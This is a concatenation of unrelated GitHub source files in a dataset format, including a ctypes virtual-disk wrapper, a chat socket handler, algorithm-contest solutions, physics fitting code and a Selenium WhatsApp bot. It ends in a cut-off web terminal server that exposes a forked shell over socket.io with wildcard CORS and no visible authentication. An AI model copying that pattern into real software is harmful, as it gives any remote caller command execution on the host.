_OVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n )\n\nclass _OVDP_VERSION3(ctypes.Structure):\n _fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n (\"SnapshotId\", GUID),\n )\n\nclass _OVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", _OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n (\"Version3\", _OVDP_VERSION3),\n )\n\nclass OPEN_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _OVDP_UNION))\n _anonymous_ = (\"u\",)\nPOPEN_VIRTUAL_DISK_PARAMETERS = POINTER(OPEN_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\nclass _AVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"Reserved\", ULONG),\n )\n\nclass _AVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"RestrictedOffset\", ULARGE_INTEGER),\n (\"RestrictedLength\", ULARGE_INTEGER),\n )\n\nclass _AVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", _OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n )\n\nclass ATTACH_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _AVDP_UNION))\n _anonymous_ = (\"u\",)\nPATTACH_VIRTUAL_DISK_PARAMETERS = POINTER(ATTACH_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\n_OpenVirtualDisk = fun_fact(\n _vdisk.OpenVirtualDisk, (\n DWORD,\n PVIRTUAL_STORAGE_TYPE,\n PWSTR,\n LONG,\n LONG,\n POPEN_VIRTUAL_DISK_PARAMETERS,\n PKHANDLE\n )\n )\n\ndef OpenVirtualDisk(storage_type, path, access_mask, flags, parameters=None):\n hdl = KHANDLE()\n raise_on_err(\n _OpenVirtualDisk(\n ref(storage_type),\n path,\n access_mask,\n flags,\n None if parameters is None else ref(parameters),\n ref(hdl)\n )\n )\n return hdl\n\n################################################################################\n\n_AttachVirtualDisk = fun_fact(\n _vdisk.AttachVirtualDisk, (\n DWORD,\n KHANDLE,\n PVOID, # no interest in supplying a security descriptor\n LONG,\n ULONG,\n PATTACH_VIRTUAL_DISK_PARAMETERS,\n PVOID, # no interest in supplying an overlapped\n )\n )\n\ndef AttachVirtualDisk(hdl, flags, prov_flags=0, parameters=None):\n raise_on_err(\n _AttachVirtualDisk(\n hdl,\n None,\n flags,\n prov_flags,\n None if parameters is None else ref(parameters),\n None\n )\n )\n\n################################################################################\n\n_DetachVirtualDisk = fun_fact(\n _vdisk.DetachVirtualDisk, (\n DWORD,\n KHANDLE,\n LONG,\n ULONG,\n )\n )\n\ndef DetachVirtualDisk(hdl, flags=0, prov_flags=0):\n raise_on_err(_DetachVirtualDisk(hdl, flags, prov_flags))\n\n################################################################################\n","repo_name":"RoccoMatano/ctwin32","sub_path":"ctwin32/virtdisk.py","file_name":"virtdisk.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"40432995887","text":"from flask_socketio import SocketIO, emit, join_room, leave_room\nfrom flask_login import current_user\nfrom app.models import db, Chat\nimport os\n\nif os.environ.get(\"FLASK_ENV\") == \"production\":\n origins = [\"http://yillow-app.herokuapp.com\", \"https://yillow-app.herokuapp.com\"]\nelse:\n origins = \"*\"\n\nsocketio = SocketIO(cors_allowed_origins=origins)\n\n@socketio.on(\"join\")\ndef on_join(channel_id):\n join_room(channel_id)\n\n@socketio.on(\"leave\")\ndef on_leave(channel_id):\n leave_room(channel_id)\n\n@socketio.on(\"chat\")\ndef handle_chat(data):\n channel_id = data['channel_id']\n user_id = data['user_id']\n message = data[\"message\"]\n created_at = data[\"created_at\"]\n\n new_chat = Chat(channel_id=channel_id, user_id=user_id, message=message, created_at=created_at)\n db.session.add(new_chat)\n db.session.commit()\n\n\n emit(\"chat\", new_chat.to_dict(),\\\n to=str(channel_id),\n broadcast=True)\n\n@socketio.on(\"edit\")\ndef handle_edit(data):\n chat_id = data[\"id\"]\n message = data[\"message\"]\n\n chat = Chat.query.get(chat_id)\n chat.message = message\n\n db.session.commit()\n\n emit(\"edit\", chat.to_dict(), to=str(chat.channel_id), broadcast=True)\n\n@socketio.on(\"delete\")\ndef handle_delete(chat_id):\n chat = Chat.query.get(chat_id)\n channel_id = str(chat.channel_id)\n\n db.session.delete(chat)\n db.session.commit()\n\n data = {\"chat_id\": chat_id, \"channel_id\": int(channel_id)}\n\n emit(\"delete\", data, to=channel_id, broadcast=True)\n","repo_name":"frances-y-h/yillow","sub_path":"app/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"4662021490","text":"import csv\nimport json\nfrom shutil import rmtree\nfrom os import mkdir, path\n\n\ndef create_dir():\n mkdir('temp')\n\n\ndef remove_dir():\n rmtree('temp')\n\n\ndef csv_to_json(csv_file, json_file):\n arr = list()\n\n if path.exists(csv_file):\n with open(csv_file, encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n\n for line in reader:\n arr.append(line)\n\n with open(json_file, 'w', encoding=\"utf8\") as f:\n indent = len(arr[0])\n conv = json.dumps(arr, indent=indent, ensure_ascii=False)\n f.write(conv)\n else:\n return \"CSV file doesn't exist!\"\n\n\n# def json_to_csv(csv_file, json_file):\n#\n return\n","repo_name":"kreker783/CSV-JSON-Converter","sub_path":"code/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2135336772","text":"N = int(input())\npeople = []\nfor _ in range(N):\n people.append(list(map(int, input().split())))\nfor i in people:\n rank = 1\n for j in people:\n if j[0] > i[0] and j[1] > i[1]:\n rank += 1\n print(rank, end=' ')\n","repo_name":"WoosubLeee/algorithm-study","sub_path":"백준/Silver/7568/7568_덩치.py","file_name":"7568_덩치.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24938891747","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.arange(-3, 1, 0.1)\ny1 = np.exp(4 * x)\ny2 = 2 * np.cos(3 * x)\ny3 = x ** 2 + 4\nplt.plot(x, y1, color=\"red\", linestyle=\":\", label=\"$y=e^{4x}$\")\nplt.plot(x, y2, color=\"blue\", label=\"$y=2\\cos(3x)$\")\nplt.plot(x, y3, color=\"forestgreen\", linestyle=\"--\", label=\"$y=x^2+4$\")\nplt.xticks(np.arange(-3, 2))\nplt.yticks(np.arange(0, 40, 5))\nplt.title(\"Wykres trzech funkcji\")\nplt.grid()\nplt.legend(loc=2)\nplt.savefig(\"zad1.webp\")\nplt.show()\n","repo_name":"pjastr/wd2023_egz_rozw","sub_path":"F11/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37635874669","text":"import numpy as np\nimport torch\nfrom torch_geometric.utils import degree\nfrom torch_scatter import scatter_sum\n\nfrom data_utils import load_dimacs_cnf, load_dimacs_graph\nfrom const_language import Constraint_Language\n\n\nclass CSP_Data:\n \"\"\" Class to represent a binary CSP instance \"\"\"\n\n def __init__(self, num_vars, const_lang, edges, batch=None, path=None):\n \"\"\"\n :param num_vars: Size of the underlying domain\n :param const_lang: A Constraint_Language object that specifies the language of the instance\n :param edges: A dict of edge tensors. edges[rel] is a torch long tensor of shape 2 x m_{rel} where edges[rel]_i is the i-th edge of relation rel.\n :param batch: optional long tensor that indicates the instance in the batch which each variable belongs to.\n :path path: Optional string that holds the original path of an instance loaded from disc.\n \"\"\"\n self.num_vars = num_vars\n self.const_lang = const_lang\n self.edges = edges\n self.path = path\n\n self.batch = torch.zeros((num_vars,), dtype=torch.int64) if batch is None else batch\n self.batch_size = self.batch.max() + 1\n\n self.device = 'cpu'\n\n # degree and inverse degree needed for mean pooling\n self.var_deg = degree(torch.cat([e.reshape(-1) for e in edges.values()]), dtype=torch.float32, num_nodes=self.num_vars)\n self.var_reg = 1.0 / (self.var_deg + 1.0e-6).view(-1, 1)\n\n def to(self, device):\n # move data to given device\n self.device = device\n self.var_deg = self.var_deg.to(device)\n self.var_reg = self.var_reg.to(device)\n self.batch = self.batch.to(device)\n\n self.const_lang.to(device)\n\n for k in self.edges.keys():\n self.edges[k] = self.edges[k].to(device)\n\n @staticmethod\n def collate(data_list):\n # merge instances into one batch\n\n num_vars = sum([d.num_vars for d in data_list])\n const_lang = data_list[0].const_lang\n path = data_list[0].path\n batch = torch.cat([d.batch + i for i, d in enumerate(data_list)])\n\n # combine edges and shift variables to batch offset\n var_offset = 0\n edges = {rel: [] for rel in const_lang.relations.keys()}\n for data in data_list:\n for rel, edge_idx in data.edges.items():\n edges[rel].append(edge_idx + var_offset)\n var_offset += data.num_vars\n\n edges = {rel: torch.cat(edge_idx, dim=1) for rel, edge_idx in edges.items() if len(edge_idx) > 0}\n\n # create merged instance\n data = CSP_Data(num_vars, const_lang, edges, batch, path)\n return data\n\n def hard_assign(self, soft_assignment):\n # assign value with larges prob to each variable\n return torch.argmax(soft_assignment, dim=-1)\n\n def constraint_sat_prob(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return sat_prob: dictionary where sat_prob[rel] is a torch float tensor such that sat_prob[rel]_{i,t}. is the prob of edge i being satisfied in time step t.\n \"\"\"\n\n soft_assignment = soft_assignment.view(self.num_vars, -1, self.const_lang.domain_size)\n sat_prob = {}\n for rel, edge_idx in self.edges.items():\n # characteristic matrix\n R = self.const_lang.char_matrices[rel]\n\n # get soft assignments at each edge\n p1 = soft_assignment[edge_idx[0]]\n p2 = soft_assignment[edge_idx[1]]\n\n # compute probability\n sat_prob[rel] = (torch.matmul(p1, R) * p2).sum(dim=2)\n\n return sat_prob\n\n def count_unsat(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return num_unsat: tensor such that num_unsat_{i,t} is the number of unsatisfied constraints on instance i in time step t.\n \"\"\"\n hard_assignment = self.hard_assign(soft_assignment)\n num_unsat = torch.zeros((self.batch_size, hard_assignment.shape[1]), dtype=torch.int64, device=self.device)\n for rel, edge_idx in self.edges.items():\n R = self.const_lang.char_matrices[rel]\n v1 = hard_assignment[edge_idx[0]]\n v2 = hard_assignment[edge_idx[1]]\n edge_unsat = (1.0 - R[v1, v2]).long()\n num_unsat += scatter_sum(edge_unsat, self.batch[edge_idx[0]], dim=0)\n return num_unsat\n\n @staticmethod\n def load_2cnf(path):\n # load 2sat formula from disc\n\n const_lang = Constraint_Language.get_2sat_language()\n cnf = load_dimacs_cnf(path)\n cnf = [np.int64(c) for c in cnf]\n num_var = np.max([np.abs(c).max() for c in cnf])\n\n def clause_type(clause):\n # returns the relation type for a given clause\n if clause[0] * clause[1] < 0:\n return 'IMPL'\n elif clause[0] > 0:\n return 'OR'\n else:\n return 'NAND'\n\n # fill unit clauses\n cnf = [[c[0], c[0]] if len(c) == 1 else c for c in cnf]\n\n # normalize implication clauses\n cnf = [[c[1], c[0]] if clause_type(c) == 'IMPL' and c[0] > 0 else c if len(c) == 1 else c for c in cnf]\n\n edges = {rel: [] for rel in {'OR', 'IMPL', 'NAND'}}\n for i, c in enumerate(cnf):\n u = abs(c[0]) - 1\n v = abs(c[1]) - 1\n rel = clause_type(c)\n edges[rel].append([u, v])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n data = CSP_Data(num_vars=num_var, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcol(path, num_colors):\n # load graph from disc and create coloring instance\n\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_coloring_language(num_colors)\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edge_idx = torch.tensor([[idx_map[u], idx_map[v]] for u, v in nx_graph.edges()])\n edge_idx = edge_idx.transpose(0, 1)\n edges = {'NEQ': edge_idx}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcut(path):\n # load graph from disc and create weighted maxcut instance\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_maxcut_language()\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edges = {'EQ': [], 'NEQ': []}\n for u, v, w in nx_graph.edges(data='weight'):\n rel = 'NEQ' if w > 0 else 'EQ'\n edges[rel].append([idx_map[u], idx_map[v]])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return data\n","repo_name":"toenshoff/RUNCSP-PyTorch","sub_path":"csp_data.py","file_name":"csp_data.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35355472897","text":"import functools\nimport logging\n\nimport gvar as gv\nimport lsqfit as lsq\nimport natpy as nat\nimport numpy as np\n\nfrom utilities import jackknives, structure, particles, configIDs\n\n\nJackknifeEnsemble = jackknives.JackknifeEnsemble\nStructure = structure.Structure\n\n\nlogger = logging.getLogger(__name__)\nlogging.Formatter(fmt=\"%(name)s(%(lineno)d)::%(levelname)-8s: %(message)s\")\n\n\nclass Fit_1d:\n def __init__(\n self,\n fcn: callable,\n nparams: int,\n x: np.ndarray,\n y,\n y_err: np.ndarray = None,\n jackknives: list[JackknifeEnsemble] = None,\n initial_guess: list[float] = None,\n calculate_naive_chi_sq: bool = False,\n fit_jackknives: bool = False,\n ):\n self.fcn = fcn\n self.nparams = nparams\n self.x = x\n if isinstance(y[0], gv.GVar):\n if y_err is not None:\n logging.warning(\n \"y is array of gvar variables so passed y_err will be ignored.\"\n )\n if jackknives is not None and not fit_jackknives:\n logger.warning(\n \"Jackknives were supplied. Passing y as collection of gvar variables with fit_jackknives = False will result in the jackknives being ignored and the existing covariance between the gvars to be used instead.\"\n )\n elif jackknives is not None:\n logger.warning(\n \"Using existing correlation between the y data from gvars. Jackknives will only be used for the fit on a jackknife level.\"\n )\n\n # In case gvar were passed as a list\n self.y = gv.gvar(y)\n\n elif isinstance(y[0], (float, np.floating)):\n if y_err is jackknives is None:\n raise ValueError(\n \"y is array of floats so either y_err or jackknives must be non-None.\"\n )\n if y_err is None:\n logger.info(\n \"Setting uncertainties using covariance matrix from jackknives.\"\n )\n self.covariance_matrix = covariance_matrix(jackknives)\n self.y = gv.gvar(y, self.covariance_matrix)\n elif jackknives is None:\n self.y = gv.gvar(y, y_err)\n else:\n raise ValueError(\"y must be array of gvars or floats.\")\n\n if initial_guess is None:\n logger.info(\"Taking initial guess to be zero for all fit parameters.\")\n self.initial_guess = [0] * self.nparams\n else:\n self.initial_guess = initial_guess\n\n self.calculate_naive_chi_sq = calculate_naive_chi_sq\n if fit_jackknives and jackknives is None:\n raise ValueError(\"Jackknives must not be None to be fit\")\n self.jackknives = jackknives\n self.fit_jackknives = fit_jackknives\n\n def do_fit(self):\n self.average_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=self.initial_guess\n )\n\n if self.calculate_naive_chi_sq:\n diagonal_covariance_mat = gv.evalcov(self.y) * np.eye(self.y.size)\n self.uncorrelated_y = gv.gvar(gv.mean(self.y), diagonal_covariance_mat)\n self.naive_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=[gv.mean(self.average_fit.p)]\n )\n\n if self.fit_jackknives:\n self.jackknife_fits = []\n ncon = self.jackknives[0].ncon\n self.jackknife_fits_values = np.zeros(ncon)\n for icon in range(ncon):\n y_data = [\n jackknife_ensemble.jackknives[icon]\n for jackknife_ensemble in self.jackknives\n ]\n y_err = [\n jackknife_ensemble.uncertainties[icon]\n for jackknife_ensemble in self.jackknives\n ]\n \n self.jackknife_fits.append(\n lsq.nonlinear_fit(\n data=(self.x, y_data, y_err),\n fcn=self.fcn,\n p0=gv.mean(self.average_fit.p),\n )\n )\n self.jackknife_fits_values[icon] = self.jackknife_fits[icon].pmean\n self.jackknife_fits_values = JackknifeEnsemble(self.jackknife_fits_values)\n\ndef covariance_matrix(jackknife_ensembles: list[JackknifeEnsemble]) -> np.ndarray:\n ensemble_averages = np.asarray(\n [ensemble.ensemble_average for ensemble in jackknife_ensembles]\n )\n product_of_average = ensemble_averages[:, None] * ensemble_averages[:, None].T\n jackknives = np.asarray([ensemble.jackknives for ensemble in jackknife_ensembles])\n ncon = jackknives.shape[1]\n average_of_product = np.matmul(jackknives, jackknives.T) / ncon\n return (ncon - 1) * (average_of_product - product_of_average)\n\n\nclass PolarisabilityFit(Fit_1d):\n def __init__(\n self,\n particle: str,\n structure: Structure,\n ensemble: configIDs.PACSEnsemble,\n mass: gv.GVar,\n energy_shift: np.ndarray,\n mass_jackknives: JackknifeEnsemble = None,\n energy_shift_jackknives: list[JackknifeEnsemble] = None,\n initial_guess: float = 0,\n calculate_naive_chi_sq: bool = True,\n fit_jackknives: bool = False,\n ):\n self.particle = particle\n self.structure = structure\n self.ensemble = ensemble\n self.mass = mass\n self.energy_shift = energy_shift\n self.num_kd = energy_shift.size\n\n x = np.arange(1, self.num_kd + 1)\n\n self.landau_term = self.calculate_landau(\n mass, particle, structure, spacing=ensemble.a\n )\n y = energy_shift - self.landau_term * x\n \n if fit_jackknives and None not in (mass_jackknives, energy_shift_jackknives):\n self.mass_jackknives = mass_jackknives\n self.energy_shift_jackknives = energy_shift_jackknives\n self.landau_jackknives = self.calculate_landau(\n self.mass_jackknives.jackknives, particle, structure, spacing=ensemble.a\n )\n jackknives = [JackknifeEnsemble(self.energy_shift_jackknives[i].jackknives - self.landau_jackknives * x[i]) for i in range(self.num_kd)]\n \n else:\n jackknives = None\n\n super().__init__(\n fcn=self._quadfit,\n nparams=1,\n x=x,\n y=y,\n jackknives=jackknives,\n initial_guess=[initial_guess],\n calculate_naive_chi_sq=calculate_naive_chi_sq,\n fit_jackknives=fit_jackknives,\n )\n\n @staticmethod\n def convert_fit(fit_value: gv.GVar | np.ndarray, spacing: float, Nx = 32, Ny = 32):\n HBARC = 0.1973269718 # GeV fm\n q_d = -1/3\n return (\n -2\n * fit_value\n * nat.constants.alpha.value\n * (-1 / 3) ** 2\n * (spacing**4 * (Nx * Ny / 2 / np.pi) ** 2 / HBARC)\n )\n\n @staticmethod\n def _quadfit(x, a0):\n return x**2 * a0\n\n @staticmethod\n def calculate_landau(\n mass: float | np.ndarray, particle: str, structure: Structure, spacing: float\n ) -> float | np.ndarray:\n \n particle_charge = particles.get_particle_charge(particle, structure)\n q_d = -1 / 3\n Nx = Ny = 32\n HBARC = 0.1973269718 # GeV fm\n landau = (\n abs(particle_charge / (q_d))\n * np.pi\n / Nx\n / Ny\n * (HBARC / spacing) ** 2\n / mass\n )\n return landau\n\n\nif __name__ == \"__main__\":\n shift = np.asarray([0.0259, 0.0443])\n shift_err = np.asarray([0.0033, 0.0056])\n shift_gv = gv.gvar(shift, shift_err)\n mass = gv.gvar(1.053819, 0.011708)\n fit = PolarisabilityFit(\n \"proton_1\",\n Structure(\"uds\"),\n configIDs.PACS_ensembles[13770][\"a\"],\n mass,\n shift_gv,\n )\n fit.do_fit()\n print(fit.average_fit)\n print(fit.convert_fit(fit.average_fit.pmean, fit.ensemble.a))","repo_name":"TommiKabelitz/Physics-utilities","sub_path":"utilities/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3837372355","text":"from io import open\nfrom setuptools import setup\n\n\nversion = \"0.0.3\"\n\nwith open(\"README.md\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"pip_command\",\n version=version,\n\n author=\"pavelgs\",\n author_email=\"p6282813@yandex.ru\",\n\n description=\"lib for fast work with pip commands\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n\n url=\"https://github.com/pavelglazunov/pip-command\",\n\n license=\"Apache License, Version 2.0, see LICENSE file\",\n\n packages=[\"pip_command\"]\n)","repo_name":"pavelglazunov/pip-command","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31638124278","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom collections import defaultdict\n\nn,X = map(int,readline().split())\nxyc = list(map(int,read().split()))\n\n\nlinks = [[] for _ in range(n+1)]\nit = iter(xyc)\nfor x,y,c in zip(it,it,it):\n links[x].append((c,y))\n links[y].append((c,x))\n\nnum = [-1] * (n+1)\nnum[1] = 0\nstack = [1]\nwhile(stack):\n i = stack.pop()\n for c,j in links[i]:\n if(num[j] != -1):\n continue\n num[j] = num[i] ^ c\n stack.append(j)\n\nd = defaultdict(int)\nans = 0\nfor i,num_i in enumerate(num[1:],1):\n ans += d[num_i^X]\n d[num_i] += 1\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc045_old/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888475689","text":"# leetcode 2389. Longest Subsequence With Limited Sum\n\nclass Solution:\n def answerQueries(self, nums: List[int], queries: List[int]) -> List[int]:\n target = list(accumulate(sorted(nums)))\n answer = list()\n for query in queries :\n answer.append(bisect_right(target,query))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/12월/1225/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33010048449","text":"#!/usr/bin/python3\n\nimport random\n\ng1Count = 0\ng2Count = 0\n\nfor x in range (1,10000000):\n car = random.randint(1, 3)\n guess1 = 1\n if car == 1:\n g1Count += 1\n else:\n g2Count += 1\n\nprint (\"Guess 1 Count: %d\"%g1Count)\nprint (\"Guess 2 Count: %d\"%g2Count)\n","repo_name":"ian-flint/monty","sub_path":"monty.py","file_name":"monty.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22269615510","text":"class Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n i = 0 # Initialize the left pointer to the start of the array\n j = len(nums) - 1 # Initialize the right pointer to the end of the array\n \n while i < j: # Perform binary search until left and right pointers meet\n mid = int((i + j) / 2) # Calculate the middle index\n \n if nums[mid] < nums[mid + 1]: # If the element at mid is smaller than the next element\n i = mid + 1 # Move the left pointer to mid + 1\n else:\n j = mid # Otherwise, move the right pointer to mid\n \n return i # Return the index i as the peak element index\n","repo_name":"ofmukesh/Learning","sub_path":"LeetCode_Top_150/findPeakElement.py","file_name":"findPeakElement.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16002402445","text":"from selenium import webdriver\nimport time\n\nbrowser = webdriver.Chrome('/home/disciple/chromedriver')\nbrowser.get('https://web.whatsapp.com/')\n\ntime.sleep(15)\n\nuser_name = 'Whatsapp bot'\n\nuser = browser.find_element_by_xpath('//span[@title=\"{}\"]'.format(user_name))\nuser.click()\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\nmessage_box.send_keys('Hey, I am your whatsapp bot')\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[3]/button')\nmessage_box.click()\n","repo_name":"Gurupra5ad/whatsapp-automation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15120644716","text":"import random\nimport sys\nfrom time import sleep\n\n\nclass Game:\n def __init__(self, lower, upper, number_of_guesses):\n super().__init__()\n self.lower = lower\n self.upper = upper\n self.number_of_guess = number_of_guesses\n self.name = None\n self.guess = None\n self.sleep_time = 2 # Sleeping to add effect.\n self.secret_number = None\n self.correctly_guessed = None\n self.ending_answer = None\n\n def welcome_sequence(self):\n print(\"Hello, what is your name?\")\n self.name = input()\n\n print(f\"Well, {self.name}, I am thinking of a number between {self.lower} and {self.upper}. Can you guess it?\")\n sleep(self.sleep_time)\n print(f\"You have {self.number_of_guess} guesses; use them wisely.\")\n sleep(self.sleep_time)\n\n self.begin_guessing()\n\n def begin_guessing(self):\n self.secret_number = random.randint(self.lower, self.upper)\n self.correctly_guessed = False\n\n print(f\"Alright, {self.name}, start guessing by entering an integer!\")\n for guess_number in range(self.number_of_guess):\n self.grab_guess()\n if self.guess > self.secret_number:\n print(\"That's too high!\")\n elif self.guess < self.secret_number:\n print(\"That's too low!\")\n elif self.guess == self.secret_number:\n print(f\"You correctly guessed the number in {guess_number} amount of tries!\")\n self.correctly_guessed = True\n self.ending()\n self.ending()\n\n def ending(self):\n self.ending_answer = None\n\n if self.correctly_guessed:\n sleep(self.sleep_time)\n print(f\"I'm impressed {self.name}. Guessing the correct number was not an easy task.\")\n else:\n print(f\"Unfortunately you ran out of guesses. The secret number was {self.secret_number}.\")\n\n sleep(self.sleep_time)\n print(f\"What do you say {self.name}, would you like to play again? (y/n):\")\n self.ending_answer = input()\n\n if self.ending_answer == 'y':\n self.begin_guessing()\n else:\n print(\"Thanks for playing!\")\n\n sleep(self.sleep_time)\n sys.exit()\n\n def grab_guess(self):\n try:\n self.guess = int(input())\n except ValueError:\n print(\"That's not an integer, try again...\")\n self.grab_guess()\n\n\nif __name__ == '__main__':\n Game(1, 20, 5).welcome_sequence()\n","repo_name":"SinfulPhantom/Guessing-Game","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71732261929","text":"import os, sys\nimport struct\nimport pty, fcntl, termios\nimport time\nimport array\n\nimport subprocess\nimport asyncio\n\nimport json\nimport platform\n\n\ntry:\n import socketio\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install python-socketio\", shell=True, check=True)\n import socketio\n\ntry:\n import uvicorn\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install uvicorn[standard]\", shell=True, check=True)\n import uvicorn\n\n\nPORT = 0\nSHELL = \"\"\nCHILD = 0\n\nclass TTY:\n pid = None\n fd = None \n\n def __init__(self):\n try:\n pid, fd = pty.fork()\n except OsError as e:\n print(f\"OSError: {e}\")\n\n if pid < 0:\n # error\n print(\"pty fork error!\")\n elif pid == CHILD:\n sys.stdout.flush()\n try:\n os.environ[\"TERM\"] = \"xterm-256color\"\n os.execl(SHELL, SHELL)\n except:\n print(\"execl failed!\")\n\n else:\n self.pid = pid\n self.fd = fd\n\n self.resize(0, 0)\n\n tcattrib = termios.tcgetattr(fd)\n tcattrib[3] = tcattrib[3] & ~(termios.ICANON)\n termios.tcsetattr(fd, termios.TCSAFLUSH, tcattrib)\n\n \n def resize(self, cols, rows):\n fcntl.ioctl(self.fd, termios.TIOCSWINSZ, struct.pack(\"HHHH\", rows, cols, 0, 0))\n\n def write(self, bytes):\n try:\n os.write(self.fd, bytes)\n except OSError as e:\n print(f\"os.write() error: {e}\")\n \n\n def read(self):\n buf = array.array('i', [0])\n query = termios.FIONREAD\n if platform.system() == \"Darwin\":\n query = termios.TIOCOUTQ\n if fcntl.ioctl(self.fd, query, buf, 1) < 0:\n print(\"error with fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(self.fd, buf[0])\n \n def tcDrain(self):\n termios.tcdrain(self.fd)\n\n def close(self):\n self.write(b\"\\0\")\n os.close(self.fd)\n\n\ndef readSTDIN():\n buf = array.array('i', [0])\n if fcntl.ioctl(sys.stdin.fileno(), termios.FIONREAD, buf, 1) < 0:\n print(\"error with fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(sys.stdin.fileno(), buf[0])\n\nserver = socketio.AsyncServer(async_mode='asgi', cors_allowed_origins=\"*\")\napp = socketio.ASGIApp(server)\n\nconnections = {}\n\nasync def ttyFN():\n while True:\n for sid, tty in connections.items():\n data = tty.read()\n if data:\n await server.emit(\"dat2fe\", data=data, to=sid)\n\n await asyncio.sleep(0.01)\n\n@server.event\nasync def connect(sid, environ, auth):\n print(f\"connection: {sid}\")\n connections[sid] = TTY()\n 